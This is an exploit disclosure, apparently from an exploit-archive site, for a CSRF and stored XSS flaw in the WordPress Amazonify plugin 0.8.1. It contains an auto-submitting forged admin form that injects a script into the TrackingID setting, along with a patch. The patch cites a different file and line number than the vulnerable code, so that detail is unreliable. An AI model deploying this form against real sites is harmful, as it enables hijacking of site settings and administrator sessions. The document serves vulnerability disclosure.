Wordpress Amazonify Plug-in XSS/CSRF Vulnerabilities

######################
# Exploit Title : Wordpress Amazonify Plug-in XSS/CSRF
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/amazonify/
# Date: 2015-08-20
# Tested On : Windows7
# Software Link : https://downloads.wordpress.org/plugin/amazonify.zip
# Version : 0.8.1
######################
# Vulnerable Code:
File: amazonify.php - Line 173

<input id="TrackingID" name="TrackingID" type="text" value="<?php echo $tracking_id; ?>">
######################
# Exploit:

<form name="form1" method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=amazonify.php">
<input id="TrackingID" name="TrackingID" type="hidden" value='"><script>alert(/Ehsan Ice/)</script>'>
<input type="hidden" id="ProductPreview" name="ProductPreview" value="1" >
<input type="hidden" id="ContextLink" name="ContextLink" value="1" >
<input name="AmazonifyUpdate" type="hidden" value="Update Options &raquo;">
</form>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
######################
# Patch:
File: bookmarkify.php - Line 906

<input id="TrackingID" name="TrackingID" type="text" value="<?php echo htmlspecialchars($tracking_id); ?>">
######################
# Discovered By : Ehsan Hosseini
######################

#  0day.today [2018-03-02]  #